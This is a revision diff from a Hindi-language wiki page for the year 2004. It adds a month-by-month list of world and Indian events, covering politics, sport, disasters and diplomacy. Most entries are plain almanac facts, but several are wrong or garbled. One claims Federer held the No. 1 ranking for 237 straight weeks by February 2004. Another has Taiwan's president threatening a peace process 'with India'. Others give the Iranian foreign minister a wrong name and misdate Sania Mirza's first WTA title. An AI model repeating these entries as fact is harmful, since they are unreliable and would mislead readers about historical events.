Difference between revisions of "2004"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(36 intermediate revisions by 7 users not shown)
Line 1: Line 1:
{{आधार}}
 
 
{{वर्ष}}
 
{{वर्ष}}
 
यह पन्ना [[ग्रेगोरी कलैण्डर]] के [[वर्ष]] [[ईसवी सन्]]  2004 का है।  
 
यह पन्ना [[ग्रेगोरी कलैण्डर]] के [[वर्ष]] [[ईसवी सन्]]  2004 का है।  
Line 6: Line 5:
  
 
==वर्ष ईसवी सन् 2004 में घटी महत्त्वपूर्ण घटनाएँ==
 
==वर्ष ईसवी सन् 2004 में घटी महत्त्वपूर्ण घटनाएँ==
* [[18 जनवरी]] - [[भारत]] ने [[क्रिकेट]] की एकदिवसीय श्रृंखला में [[आस्ट्रेलिया]] को 19 रनों से हराया।  
+
* [[1 जनवरी]] - चेक राष्ट्रपति वाक्लाव हावेल को गांधी शांति पुरस्कार प्रदान किये गये, सार्क देशों ने दक्षिण एशिया को मुक्त व्यापार क्षेत्र बनाने वाली साफ्टा संधि और सार्क आतंकवाद विरोधी संधि को मंजूरी दी।
 +
* [[ 3 जनवरी]] - 12वें सार्क सम्मेलन में भाग लेने प्रधानमंत्री अटल बिहारी वाजपेयी इस्लामाबाद पहुँचे।
 +
* [[ 4 जनवरी]] - भारत के प्रधानमंत्री अटल बिहारी वाजपेयी और पाक प्रधानमंत्री जमाली के बीच इस्लामाबाद में वार्ता आयोजित।
 +
* [[18 जनवरी]] - [[भारत]] ने [[क्रिकेट]] की एकदिवसीय शृंखला में [[आस्ट्रेलिया]] को 19 रनों से हराया।  
 
* [[19 जनवरी]] - [[हिमाचल प्रदेश]] में चम्बा ज़िले के गरौला गांव में एक बस के नदी में गिर जाने से 21 लोग मारे गए।  
 
* [[19 जनवरी]] - [[हिमाचल प्रदेश]] में चम्बा ज़िले के गरौला गांव में एक बस के नदी में गिर जाने से 21 लोग मारे गए।  
 +
* [[23 जनवरी]] - [[मध्यप्रदेश]] में गोवंश वध पर पूर्णतया प्रतिबंध लागू।
 +
* [[25 जनवरी]] - अंतरिक्ष यान ऑपर्च्युनिटी मंग्रल ग्रह पर सफलतापूर्वक उतरा।
 +
* [[26 जनवरी]] - ब्रिटेन की महारानी एलिजाबेथ ने माइक्रोसाफ़्ट अध्यक्ष बिल गेट्स को 'नाइट' की उपाधि प्रदान करने की घोषणा की।
 +
* [[31 जनवरी]] - पाकिस्तानी परमाणु कार्यक्रम के जनक डाक्टर अब्दुल कादिर ख़ान प्रधानमंत्री के विशेष सलाहकार पद से बर्खास्त।
 +
* [[2 फ़रवरी]] - स्विस टेनिस प्लेयर रोजर फ़ेडरर 237 हफ्तों तक लगातार पहली रैकिंग पर रहे। यह एक रिकार्ड है।
 +
* [[5 फ़रवरी]] - पाकिस्तान के राष्ट्रपति परवेज मुशर्रफ़ ने परमाणु प्रौद्योगिकी के ग़लत इस्तेमाल के मामले में परमाणु वैज्ञानिक अब्दुल कादिर ख़ान को माफी दी।
 +
* [[6 फ़रवरी]] - तेरहवीं लोकसभा भंग।
 +
* [[10 फ़रवरी]] - बगदाद में पुलिस स्टेशन के बाहर हुए कार बम विस्फोट में 45 लोगों की मौत हो गई।
 +
* [[13 फ़रवरी]] - भारतीय टीम ने क्वालालम्पुर में दसवीं एशियाई निशानेबाजी चैम्पियनशिप में स्वर्ण पदक जीता।
 +
* [[14 फ़रवरी]] - जर्मन निदेशक की 'हेड आन' फ़िल्म को गोल्डन बीयर पुरस्कार मिला।
 +
* [[16 फ़रवरी]] - इस्लामाबाद में भारत और पाकिस्तान के अधिकारियों के बीच वार्ता प्रारम्भ।
 +
* [[17 फ़रवरी]] - फूलनदेवी हत्याकांड का मुख्य अभियुक्त शमशेर सिंह राणा तिहाड़ जेल से फरार।
 +
* [[19 फ़रवरी]] - कीटनाशकों और औद्योगिक रसायनों पर प्रतिबंध लगाने वाली स्टॉकहोम संधि का विश्व के 50 से ज़्यादा देशों द्वारा अनुमोदन।
 +
* [[21 फ़रवरी]] - लॉन टेनिस में [[सानिया मिर्ज़ा]] डब्ल्यू.टी.ए. खिताब जीतने वाली पहली भारतीय महिला खिलाड़ी बनी।
 +
* [[24 फ़रवरी]] - रूस के राष्ट्रपति ब्लादीमीर पुतिन ने प्रधानमंत्री मिखाइल कास्यानोव को उनके पद से हटाया।
 +
* [[26 फ़रवरी]] - मकदुनिया के राष्ट्रपति बेरिस ट्रेज कोवस्की की विमान दुर्घटना में मृत्यु।
 +
* [[29 फ़रवरी]] - [[अंतर्राष्ट्रीय अंतरिक्ष स्टेशन]] के यात्री मिशेल फ़ोएल का अलेक्ज़ेंडर केलरी अंतरिक्ष में उतरे, पर अंतरिक्ष सूट में ख़राबी के कारण पुन: वापस स्टेशन लौट गये।
 +
* [[1 मार्च]] - रूस के राष्ट्रपति ने मिखाइल फ़्रैदकोव को प्रधानमंत्री नियुक्त किया। हैती के राष्ट्रपति ज्यों बर्तरा एसिस्तदे देश छोड़कर दक्षिण अफ़्रीका भागे।
 +
* [[6 मार्च]] - उत्तर कोरिया का यूरेनियम आधारित कार्यक्रम होने से फिर इन्कार।
 +
* [[9 मार्च]] - पाकिस्तान ने 2000 किमी. की मारक क्षमता वाले सतह तक मार करने वाले 'शाहीन-2' (हत्फ-6) प्रक्षेपास्त्र का सफल परीक्षण किया।
 +
* [[11 मार्च]] - स्पेन में तीन रेलवे स्टेशनों पर हुए बम विस्फोटों में 190 मरे, 1200 घायल।
 +
* [[12 मार्च]] - दक्षिण कोरियाई संसद में महाभियोग पारित होने के बाद राष्ट्रपति रोह मू हुन पद से निलम्बित, लाहौर में दसवाँ दक्षेस लेखक सम्मेलन प्रारम्भ।
 +
* [[14 मार्च]] - चीन में निजी सम्पत्ति को क़ानूनी मान्यता प्रदान करने के लिए संविधान में संशोधन।
 +
* [[16 मार्च]] - रूस में नौ मंजिला इमारत में विस्फोट, 21 मरे।
 +
* [[19 मार्च]] - अमेरिका ने विश्व व्यापार संगठन में पहली बार चीन पर मुकदमा ठोका।
 +
* [[30 मार्च]] - ताइवान के राष्ट्रपति शेन शुवी बियान राष्ट्रपति पद के लिए भारत के साथ शांति प्रक्रिया से हटने की धमकी दी।
 +
* [[1 अप्रैल]] - मुल्तान में भारत ने पाक धरती पर पहली जीत दर्ज करते हुए पाकिस्तान को एक पारी और 52 रनों से हराया।
 +
* [[4 अप्रैल]] - भारत-नेपाल की अंतर्राष्ट्रीय सीमा पर माओवादियों ने 18 भारतीय तेल टैंकरों में आग लगाई।
 +
* [[7 अप्रैल]] - एमनेस्टी इंटरनेशनल द्वारा जारी रिपोर्ट में मौत की सज़ा देने में चीन, ईरान व अमेरिका को सबसे आगे बताया गया है। क्वालालंमपुर में म्यांमार दूतावास के शरणार्थियों को आग के हवाले किया।
 +
* [[9 अप्रैल]] - ईराक में संघर्ष तेज़ पर अमेरिकी काफ़िले पर हमले में 9 लोगों की मृत्यु। पुर्तग़ाल के सर्वोच्च न्यायालय ने भारत के कई आपराधिक मामलों में वांछित माफिया सरगना अबू सलेम के भारत प्रत्यर्पण सम्बन्धी आदेश की पुन: समीक्षा करने को कहा।
 +
* [[11 अप्रैल]] - इस्लामाबाद में भारत के प्रख्यात गायक कलाकार सोनू निगम के कार्यक्रम स्थल के पास एक कार में बम विस्फोट।
 +
* [[13 अप्रैल]] - एन्टीगुआ में ब्रायन लारा ने इंग्लैंड के विरुद्ध खेलते हुए 400 रनों की ऐतिहासिक पारी खेली।
 +
* [[14 अप्रैल]] - अमेरिकी राष्ट्रपति जार्ज बुश ने ईराक को दूसरा वियतनाम न बनने देने की घोषणा की।
 +
* [[15 अप्रैल]] - राजीव गांधी हत्याकांड से जुड़े लिट्टे उग्रवादी वी. मुरलीधरन की कोलम्बो में हत्या की गयी।
 +
* [[16 अप्रैल]] - भारत में रावलपिंडी में तीसरे टेस्ट मैच में पाकिस्तान को हराकर दोनों देशों के बीच आयोजित शृंखला 2-1 से जीती।
 +
* [[21 अप्रैल]] - [[बसरा]] में मिसाइल हमले में 68 लोगों की मृत्यु।
 +
* [[22 अप्रैल]] - उत्तर कोरिया में ट्रेनों की भीषण टक्कर, 3000 हताहत।
 +
* [[25 अप्रैल]] - जिम्बाव्वे में श्रीलंका के ख़िलाफ़ एक दिवसीय मैचों में न्यूनतम 35 रनों का रिकार्ड बनाया। यूनानी साइप्रस ने एकीकरण योजना ठुकराई। चीन में सार्स की बीमारी एक बार फिर से फैलने की पुष्टि हुई।
 +
* [[26 अप्रैल]] - ईराक के नये झंडे को मान्यता मिली।
 +
* [[28 अप्रैल]] - थाबोम्बेकी ने दक्षिण अफ़्रीका के राष्ट्रपति पद की शपथ ली। थाइलैंड में पुलिस चौकी पर हमले में 122 लोगों की मृत्यु।
 +
* [[30 अप्रैल]] - फजुला (ईराक) में हिंसा में 10 अमेरिकी सैनिक मारे गये।
 +
* [[1 मई]] - यूरोपीय संघ में 10 नये राष्ट्र शामिल।
 +
* [[2 मई]] - मारेक बेल्का पोलैंड के नये प्रधानमंत्री बने।
 +
* [[3 मई]] - वेस्टइंडीज ने छठे एक दिवसीय मैच में इंग्लैंड को चार विकेट से परास्त किया।
 +
* [[6 मई]] - चीन ने सिक्किम को भारत का अंग माना।
 +
* [[7 मई]] - नेपाल के प्रधानमंत्री सूर्य बहादुर थापा ने इस्तीफ़ा दिया।
 +
* [[8 मई]] - श्रीलंका के मुरलीधरन ने 521 विकेट लेकर सर्वाधिक टेस्ट विकेट लेने का रिकार्ड बनाया।
 +
* [[9 मई]] - चेचेन्या में एक विस्फोट में वहाँ के राष्ट्रपति अखमद कादरोव का निधन।
 +
* [[14 मई]] - डेली मिरर नामक पत्रिका ने ईराक में युद्धबंदियों पर कथित अत्याचार को दर्शाने वाली झूठी तस्वीरों के प्रकाशन के लिए ब्रिटेन से माफी मांगी।
 +
* [[16 मई]] - रोजर फ़ेडेरर ने हेम्बर्ग मास्टर्स ख़िताब जीता।
 +
* [[18 मई]] - इस्रायल के राफा विस्थापित कैम्प में इस्रायली सैनिकों ने 19 फ़िलिस्तीनियों को मौत के घाट उतारा।
 +
* [[20 मई]] - ताइवान में नवगठित सरकार ने शपथ ग्रहण की। यूरोपीय संघ के बाद अमेरिका ने भी कृषि निर्यात सब्सिडी कम करने की घोषणा की।
 +
* [[23 मई]] - बांग्लादेश में तूफ़ान के कारण मेघना नदी में नाव डूबने से 250 डूबे। सिंगापुर में जहाज़ के टैंकर से टकराने के कारण 4000 कारें डूबी।
 +
* [[29 मई]] - म्यांमार में चक्रवाती तूफ़ान ने 140 लोगों की जान ली। पाकिस्तान ने परमाणु वैज्ञानिक अब्दुल कादिर ख़ान पर लगाये गये प्रतिबंधों में ढील दी।
 +
* [[30 मई]] - सऊदी अरब में बंधक संकट समाप्त, परन्तु दो भारतीयों सहित 22 की हत्या।
 +
* [[1 जून]] - इराकी प्रशासकीय परिषद के प्रमुख सुन्नी नेता गाजी मशाल अजीज अल यावर ईराक के नये राष्ट्रपति बने।
 +
* [[2 जून]] - आस्ट्रेलियाई मॉडल जेनिफ़र हॉकिन्स मिस यूनिवर्स बनीं।
 +
* [[3 जून]] - केन फ़ोर्ड नासा के अंतरिक्ष खोज पैनल के नेतृत्वकर्ता बने।
 +
* [[6 जून]] - भूतपूर्व अमेरिकी राष्ट्रपति रोनाल्ड रीगन का निधन।
 +
* [[7 जून]] - इस्रायली मंत्रिमंडल ने गाजा क्षेत्र से बस्तियाँ हटाने सम्बन्धी प्रस्ताव को मंजूरी दी।
 +
* [[8 जून]] - दुबई हवाई अड्डे पर यात्रियों को 30 दिरहम या 8.2 डालर अतिरिक्त शुल्क का भार। भारत सहित विश्व के कई देशों में 122 वर्ष बाद पुन: देखा गया शुक्र पारगमन का अद्भुत नज़ारा।
 +
* [[12 जून]] - सवन्ना (जार्जिया) में समूह-8 सम्मेलन सम्पन्न। अमेरिकी राष्ट्रपति बुश ने उत्तरी कोरिया के सर्वोच्च नेता किम जांग द्वितीय के साथ सीधी बातचीत का प्रस्ताव ठुकराया।
 +
* [[13 जून]] - लोकतांत्रिक गणराज्य कांगो में राष्ट्रपति जोसेफ़ कबीला के ख़िलाफ़ तख्ता पलट का प्रयास विफल। ईराक के विदेश उपमंत्री बासम सालिह कुन्बा की हत्या।
 +
* [[14 जून]] - पंचशील सिद्धान्त की 50वीं वर्षगांठ पर बीजिंग में अंतर्राष्ट्रीय सेमिनार।
 +
* [[15 जून]] - ब्रिटेन के साथ परमाणु सहयोग को राष्ट्रपति बुश की स्वीकृति मिली। पूर्व अमेरिकी राष्ट्रपति बिल क्लिंटन की आत्मकथा 'माई लाइफ़' बेस्ट सेलर बनी।
 +
* [[17 जून]] - मंगल पर पृथ्वी की चट्टानों से मिलते-जुलते पत्थर मिले। बगदाद में सेना की भर्ती केन्द्र पर विस्फोट में 42 मरे तथा 127 घायल।
 +
* [[18 जून]] - चाड के सैनिकों ने 69 सूडानी मिलिशियाई को मार गिराया। दक्षिण कोरिया ने अगस्त माह में ईराक में सेना भेजने का निर्णय लिया।
 +
* [[21 जून]] - चीन ने भारत और पाकिस्तान वार्ता का समर्थन किया।
 +
* [[24 जून]] - जॉन नेग्रोपोटे ईराक में अमेरिका के पहले राजदूत बने।
 +
* [[25 जून]] - रूस द्वारा भारत के साथ रणनीतिक साझेदारी बढ़ाने का निर्णय।
 +
* [[26 जून]] - पाकिस्तान के प्रधानमंत्री जमाली का इस्तीफ़ा, शुजात हुसैन नये कार्यवाहक प्रधानमंत्री बने।
 +
* [[27 जून]] - अमेरिका और यूरोपीय संघ ने जी.पी.एस. गैलेलियो के विकास में सहयोग से संबंधित समझौते पर हस्ताक्षर किये।
 +
* [[28 जून]] - अमेरिकी गठबंधन की सेना ने ईराक की अंतरिम सरकार को संप्रभुता सौंपी।
 +
* [[29 जून]] - पूर्वी एशिया सम्मेलन (जकार्ता) में आसियान को प्रमुख ताकत बनाने पर सहमति।
 +
* [[1 जुलाई]] - आसियान ने अंतर्राष्ट्रीय आतंकवाद से निपटने हेतु आस्ट्रेलिया से समझौता किया।
 +
* [[2 जुलाई]] - भारत और पाकिस्तान के विदेश मंत्री ने जकार्ता में आपसी बातचीत की।
 +
* [[3 जुलाई]] - रूस की मारिया शारापोवा महिला विम्बलडन चैम्पियन बनीं।
 +
* [[5 जुलाई]] - ग्रीस ने यूरो कप 2004 फ़ुटबाल प्रतियोगिता जीतकर इतिहास बनाया।
 +
* [[9 जुलाई]] - एशियाई विकास बैंक ने आतंकवाद से लड़ने हेतु अपने 42 सदस्य देशों के लिए एक कोष बनाया।
 +
* [[11 जुलाई]] - एचआईवी-एड्स पर एशियाई मंत्रियों का सम्मेलन [[बैंकॉक]] में।
 +
* [[13 जुलाई]] - रूसी राष्ट्रपति पुतिन ने साइबेरिया और देश के सुदूर पूर्ववर्ती इलाकों के विकास के लिए भारत से और मज़बूत संबंधों की इच्छा जताई।
 +
* [[15 जुलाई]] - माओवादियों से वार्ता में नेपाल के प्रधानमंत्री ने विदेशी मध्यस्थता मंजूर की।
 +
* [[16 जुलाई]] - चीन ने उत्तरी चीन के सबसे बड़े तटीय शहर त्यानचिन में पहला आनलाइन वायु सुरक्षा अभ्यास किया।
 +
* [[18 जुलाई]] - अमेरिका ने 50 करोड़ डालर का पाक का कर्जा माफ किया।
 +
* [[19 जुलाई]] - तीन बार टाले जाने के बाद दुनिया के सबसे बड़े दूर संचार उपग्रह को लेकर एरियन-5 फ़्रेंच गुयाना के कोरू प्रक्षेपण केन्द्र से रवाना।
 +
* [[21 जुलाई]] - संयुक्त राष्ट्र आम सभा ने भारी बहुमत से पश्चिमी किनारे के फ़िलिस्तीनी क्षेत्रों से इस्रायल को बाढ़ हटाने का प्रस्ताव पारित किया।
 +
* [[22 जुलाई]] - शांति के लिए 1976 में नोबेल पुरस्कार जीतने वाली बैटी बिलियम्स मैक्सिको में गिरफ़्तार।
 +
* [[24 जुलाई]] - इटली ने भारतीय पर्यटकों के लिए सात वीजा काल सेंटर शुरू करने का निर्णय लिया।
 +
* [[25 जुलाई]] - पाकिस्तान के परमाणु वैज्ञानिक अब्दुल कादिर ख़ान के तीन सहयोगी रिहा।
 +
* [[26 जुलाई]] - ईरान के विदेश मंत्री कमल करजई ने भारतीय प्रधानमंत्री के साथ गैस पाइप लाइन के प्रस्ताव पर वार्ता की। अर्जेन्टीना को हराकर फ़ुटबाल का कोपा कप ब्राजील ने जीता।
 +
* [[28 जुलाई]] - इराक के बाकूबा शहर में एक पुलिस भर्ती केन्द्र में विस्फोट से 68 लोगों की मृत्यु।
 +
* [[29 जुलाई]] - प्रधानमंत्री मनमोहन सिंह प्रधानमंत्री के रूप में अपनी पहली विदेश यात्रा के लिए बिमस्टेक-ईसी सम्मेलन में भाग लेने [[बैंकॉक]] रवाना।
 +
* [[30 जुलाई]] - भारत और पाकिस्तान के बीच तुलबुल परियोजना पर बातचीत बिना किसी सहमति के समाप्त हो गयी। पाकिस्तानी प्रधानमंत्री (मनोनीत) शौकत अजीत आत्मघाती हमले में बाल-बाल बचे।
 +
* [[31 जुलाई]] - आर्थिक सहयोग मंच बिम्सटेक का नाम बदलकर 'बंगतक्षेस' किया गया।
 +
* [[1 अगस्त]] - श्रीलंका ने प्रेमदासा स्टेडियम में आयोजित फ़ाइनल मैच में भारत को 25 रनों से हराकर एशिया कप जीत लिया। सनत जयसूर्या 'मैन आफ़ द सिरीज' बने।
 +
* [[2 अगस्त]] - अमेरिका की लिंडसे डेवनपोर्ट ने रूस की मिस्कीनी की हराकर सान डियागो टेनिस चैम्पियनशिप का महिला एकल ख़िताब जीत लिया। पराग्वे की राजधानी आसुनसियोन में एक सुपर बाज़ार में आग लगने से 300 लोग मरे।
 +
* [[3 अगस्त]] - अमेरिकी अंतरिक्ष यान मैसेंजर बुध ग्रह के लिए रवाना हुआ।
 +
* [[4 अगस्त]] - 'नासा' ने एल्टिक्स सुपर कम्प्यूटर केसी को कल्पना चावना नाम दिया।
 +
* [[6 अगस्त]] - वर्ष 2000 में फिजी के प्रधानमंत्री महेन्द्र चौधरी के ख़िलाफ़ तख्तापलट के मामले में उपराष्ट्रपति जोपे सेनीलोली को 4 वर्ष की जेल।
 +
* [[8 अगस्त]] - इटली ने बोफ़ोर्स दलाली मामले के मुख्य आरोपी ओट्टाविया क्वात्रोची को भारत को सौंपने से इन्कार किया। जापान ने चीन को पराजित करके एशिया कप फ़ुटबाल जीता।
 +
* [[10 अगस्त]] - संयुक्त राष्ट्र और सूडान के बीच दारफुर कार्ययोजना पर हस्ताक्षर।
 +
* [[11 अगस्त]] - चीनी कम्प्यूटर उद्योग के पितामह चेन चुनशियान का 70 वर्ष की उम्र में निधन। भारत और पाकिस्तान ने वांछित अपराधियों की सूचियों की अदला-बदली की। भारत और पाकिस्तान के मध्य आतंकवाद और मादक द्रव्यों की तस्करी सहित आठ मुद्दों पर इस्लामाबाद में वार्ता सम्पन्न। संयुक्त राष्ट्र परमाणु ऊर्जा एजेंसी ने ईरान को पाकिस्तान द्वारा परमाणु मदद दिये जाने की पुष्टि की।
 +
* [[12 अगस्त]] - फ़्रांस के मशहूर स्ट्राइकर जिनेदिन जिदान ने अंतर्राष्ट्रीय फ़ुटबाल से सन्न्यास लिया। इराकी शहर नजफ पर अमेरिकी हमले में 165 मारे गये।
 +
* [[13 अगस्त]] - यूनानी सभ्यता की नुमाइश के साथ ओलम्पिक शुरू।
 +
* [[15 अगस्त]] - लारा सबसे तेज 10,000 रन बनाने वाले बल्लेबाज बने।
 +
* [[16 अगस्त]] - आस्ट्रेलियाई और अमेरिकी टीम ने ओलम्पिक नौकायन में विश्व रिकार्ड क़ायम किया।
 +
* [[17 अगस्त]] - उदारवादी राजनीतिक लिओनल फ़र्नाडीस ने डोमिनिक गणराज्य के नये राष्ट्रपति के रूप में शपथ ग्रहण की।
 +
* [[19 अगस्त]] - वान डेन हुगेनबैंड ओलम्पिक सबसे तेज तैराक बने।
 +
* [[20 अगस्त]] - फ़ोर्ब्स पत्रिका ने विश्व की सर्वाधिक शक्तिशाली महिलाओं की सूची जारी की। अमेरिका की कोंडोलीजा राइस, चीन की वू यी तथा भारत की सोनिया गांधी क्रमश: प्रथम तीन स्थानों पर।
 +
* [[23 अगस्त]] - अमेरिका के जस्टिन गैटलिन 100 मीटर फर्राटा दौड़ जीतकर पृथ्वी के सबसे तेज धावक बने। चिली के निकोलस मासु ने अमेरिका के मार्डी फ़िश को हराकर ओलम्पिक पुरुष एकल टेनिस का स्वर्ण पदक जीत लिया।
 +
* [[24 अगस्त]] - फ़िलिस्तीनियों को अहिंसा का पाठ पढ़ाने अरुण गांधी रामल्ला पहुँचे।
 +
* [[27 अगस्त]] - वित्तमंत्री शौकत अजीज पाकिस्तान के नये प्रधानमंत्री चुने गये।
 +
* [[29 अगस्त]] - एथेंस ओलम्पिक का समापन।
 +
* [[31 अगस्त]] - इतालवी जनरल गिदो पामेरी को भारत और पाकिस्तान में संयुक्त राष्ट्र पर्यवेक्षक समूह का एक साल के लिए प्रधान सैन्य पर्यवेक्षक नियुक्त किया गया।
 +
* [[1 सितम्बर]] - पाकिस्तान के एक मानवाधिकार विशेषज्ञ मेहर ख़ान विलियम्स को संयुक्त राष्ट्र मानवाधिकार आयोग ने उप उच्चायुक्त नियुक्त किया।
 +
* [[7 सितम्बर]] - फिजी के विजय सिंह टाइगर वुड्स को पीछे छोड़कर विश्व के नम्बर एक गोल्फ़र बने।
 +
* [[9 सितम्बर]] - फ़िलिस्तीन के प्रधानमंत्री अहमद कुरेई ने अपने पद से इस्तीफ़ा दिया।
 +
* [[12 सितम्बर]] - उत्तर कोरिया ने अपना परमाणु कार्यक्रम जारी रखने का निर्णय लिया।
 +
* [[15 सितम्बर]] - ब्रिटिश नागरिक गुरिंदर चड्ढा को 'वूमैन आफ़ द ईयर' सम्मान।
 +
* [[17 सितम्बर]] - यूरोपीय संसद ने मालदीव पर प्रतिबंध लगाने का प्रस्ताव पारित किया।
 +
* [[20 सितम्बर]] - इंडोनेशिया में राष्ट्रपति पद के चुनाव के लिए मतदान।
 +
* [[21 सितम्बर]] - अमेरिका ने लीबिया से आर्थिक प्रतिबंध हटाया।
 +
* [[26 सितम्बर]] - अमेरिका ने असैनिक अंतरिक्ष कार्यक्रमों के लिए भारत को तकनीक देने का निर्णय किया।
 +
* [[28 सितम्बर]] - विश्व बैंक ने भारत को विश्व की चौथी सबसे बड़ी अर्थव्यवस्था कहा।
 +
* [[30 सितम्बर]] - चीनी दार्शनिक [[कन्फ़्यूशियस]] की 2555वीं जयंती मनाई गयी।
 +
* [[1 अक्टूबर]] - इस्रायली प्रधानमंत्री एरियल शैरोन के मंत्रिमंडल ने गाजा पट्टी में बड़े पैमाने पर सैनिक कार्रवाई की योजना को मंजूरी दी।
 +
* [[2 अक्टूबर]] - संयुक्त राष्ट्र सुरक्षा परिषद ने कांगों में 5900 सैनिक भेजने का प्रस्ताव मंजूर किया।
 +
* [[3 अक्टूबर]] - लश्कर-ए-तैयबा का राजनीतिक संगठन दो हिस्सों में बंटा।
 +
* [[5 अक्टूबर]] - पश्चिम एशिया पर अरब देशों के प्रस्ताव का अमेरिका ने विरोध किया।
 +
* [[6 अक्टूबर]] - इस्रायली सैन्य अभियान को रोकने का प्रस्ताव अमेरिका ने वीटो किया। अल्खानोव चेचेन्या के राष्ट्रपति बने।
 +
* [[7 अक्टूबर]] - जर्मनी ने सुरक्षा परिषद में भारत की दावेदारी का समर्थन किया।
 +
* [[8 अक्टूबर]] - भारतीय गेहूँ पर मौनसेंटो का पेटेन्ट रद्द। शांति का नोबेल पुरस्कार केन्याई पर्यावरणविद वांगरी मथाई को।
 +
* [[10 अक्टूबर]] - आस्ट्रेलिया के संसदीय चुनाव में प्रधानमंत्री जान हावर्ड की भारी जीत।
 +
* [[12 अक्टूबर]] - पाकिस्तान ने गौरी-1 मिसाइल का परीक्षण किया।
 +
* [[13 अक्टूबर]] - सऊदी अरब का हर साल एक लाख श्रमिकों की कटौती की घोषणा। चीन ने ताइवान की शांति पहल ठुकराई।
 +
* [[14 अक्टूबर]] - पाकिस्तान की नेशनल असेंबली ने राष्ट्रपति परवेज मुशर्रफ़ को सेना प्रमुख बनाये रखने वाला विधेयक पारित किया।
 +
* [[16 अक्टूबर]] - दारफुर में मरने वालों का आंकड़ा 70,000 तक पहुँचा। अमेरिका ने इराकी अबू मुसार जल जरकावी के संगठन को आतंकवादी संगठन घोषित किया।
 +
* [[17 अक्टूबर]] - न्यूजीलैंड की प्रधानमंत्री क्लार्क भारत पहुँची। गुआंतानामो बे बंदीगृह में अमेरिकी सैनिकों द्वारा बंदियों को अमानवीय यातनाएँ दिये जाने का रहस्योद्घाटन।
 +
* [[19 अक्टूबर]] - अमेरिका के विदेश मंत्री कोलिन पावेल ने यह रहस्योद्घाटन किया कि अमेरिका की कोशिशों से भारत-पाकिस्तान युद्ध टला। चीन ने अपना पहला व्यावसायिक मौसम उपग्रह छोड़ा। सू विन म्यांमार के नये प्रधानमंत्री बने।
 +
* [[20 अक्टूबर]] - बांग्लादेश में 3 पूर्व सेनाधिकारियों को मौत की सज़ा मिली। ब्रिटेन का प्रतिष्ठित साहित्य सम्मान एलन होलिंघर्स्ट को मिला।
 +
* [[22 अक्टूबर]] - अंकटाड रिपोर्ट के अनुसार विदेशों में निवेश में भारत 14वें स्थान पर। सीका सम्मेलन में सदस्य देशों ने आतंकवाद से मिलकर निपटने का संकल्प व्यक्त किया।
 +
* [[24 अक्टूबर]] - ब्राजील ने अंतरिक्ष में पहला सफल राकेट परीक्षण किया।
 +
* [[27 अक्टूबर]] - चीन ने विशालकाय क्रेन का निर्माण किया। फ़्रांस के विदेश मंत्री माइकल वार्नियर दो दिवसीय भारत यात्रा पर नई दिल्ली पहुँचे।
 +
* [[28 अक्टूबर]] - बीजिंग में 4000 वर्ष पुराने मकबरों का पता लगा। परमाणु मसले पर ईराक के साथ यूरोपीय संघ की वार्ता विफल।
 +
* [[29 अक्टूबर]] - त्रिनिदाद एवं टोबैगो के राष्ट्रपति मेक्सवेल रिचर्डस ने नई दिल्ली में भारतीय राष्ट्रपति ए.पी.जे. अब्दुल कलाम के साथ वार्ता की।
 +
* [[30 अक्टूबर]] - उक्रेन ने फ़्रांस को 3-1 से पराजित कर 39.5 अंक के साथ ओलंपियाड का स्वर्ण जीता।
 +
* [[31 अक्टूबर]] - फालुजा में अमेरिका ने हवाई हमला किया।
 +
* [[1 नवम्बर]] - बेनेट किंग वेस्ट इंडीज क्रिकेट बोर्ड के पहले विदेशी कोच बने।
 +
* [[2 नवम्बर]] - चीन के हेनान में जातीय संघर्ष में 20 मरे।
 +
* [[5 नवम्बर]] - गाजा पट्टी और पश्चिमी तट की चार बस्तियों को ख़ाली करने संबंधी प्रधानमंत्री एरियल शैरोन की योजना को इस्रायली संसद ने मंजूरी दी।
 +
* [[6 नवम्बर]] - रूस ने क्योटो करार की पुष्टि की।
 +
* [[8 नवम्बर]] - हेग में सामाजिक भागीदारी बढ़ाने पर भारत व यूरोपीय संघ सहमत।
 +
* [[10 नवम्बर]] - झेंगझोऊ चीन का आठवाँ सबसे पुराना शहर घोषित।
 +
* [[11 नवम्बर]] - यासिर अराफात का निधन। महमूद अब्बास पीएलओ के नये अध्यक्ष।
 +
* [[13 नवम्बर]] - अमेरिकी राष्ट्रपति बुश ने फ़िलिस्तीनी राष्ट्र के निर्माण के लिए चार साल का समय निर्धारित किया।
 +
* [[15 नवम्बर]] - आस्ट्रेलिया के नामकरण की दो सौवीं वर्षगांठ मनी। अमेरिकी विदेश मंत्री कोलिन पावेल ने अपने पद से इस्तीफ़ा दिया।
 +
* [[25 नवम्बर]] - पाक राष्ट्रपति परवेज मुशर्रफ़ के कश्मीर फ़ार्मूले को पाक-कश्मीर समिति ने खारिज किया।
 +
* [[27 नवम्बर]] - अंतर्राष्ट्रीय श्रम संगठन के अध्यक्ष जुआन सोमाविया भारत यात्रा पर नई दिल्ली पहुँचे।
 +
* [[29 नवम्बर]] - आसियान देशों ने चीन के साथ व्यापार के समझौते को अंतिम रूप प्रदान किया।
 +
* [[30 नवम्बर]] - बांग्लादेश की संसद में महिलाओं के लिए 45 प्रतिशत सीटों वाला विधेयक पारित।
 +
* [[3 दिसम्बर]] - पुर्तग़ाल के सर्वोच्च न्यायालय में मोनिका की अर्जी खारिज। ईराक में पुलिस थानों पर हुए हमले में 30 लोगों की मौत।
 +
* [[4 दिसम्बर]] - पेरू की मारिया जूलिया मांतिला गार्शिया को मिस वर्ल्ड 2004 चुना गया।
 +
* [[7 दिसम्बर]] - हामिद करजई ने अफ़ग़ानिस्तान के पहले निर्वाचित राष्ट्रपति के रूप में शपथ ग्रहण की।
 +
* [[8 दिसम्बर]] - पाकिस्तान ने 700 कि.मी. की दूरी तक मार करने वाली शाहीन-1 मिसाइल का सफल परीक्षण किया।
 +
* [[10 दिसम्बर]] - ढाका टेस्ट में कपिल देव को पीछे छोड़ते हुए अनिल कुम्बले टेस्ट क्रिकेट में सर्वाधिक विकेट लेने वाले पहले भारतीय बने।
 +
* [[13 दिसम्बर]] - इस्लामाबाद में भारत और पाकिस्तान के बीच परमाणु और सर क्रीक पर वार्ता प्रारम्भ।
 +
* [[27 दिसम्बर]] - भारत ने तीसरे और अन्तिम वनडे में बांग्लादेश को हराकर शृंखला 2-1 से जीती।
 +
* [[29 दिसम्बर]] - सुनामी लहरों के कारण इंडोनेशिया में मरने वालों की संख्या 60,000 पहुँची।
 +
* [[31 दिसम्बर]] - ब्यूनर्स आयर्स (अर्जेन्टीना) के एक नाइट क्लब में आग लगने से 175 लोगों की मौत।
 +
 
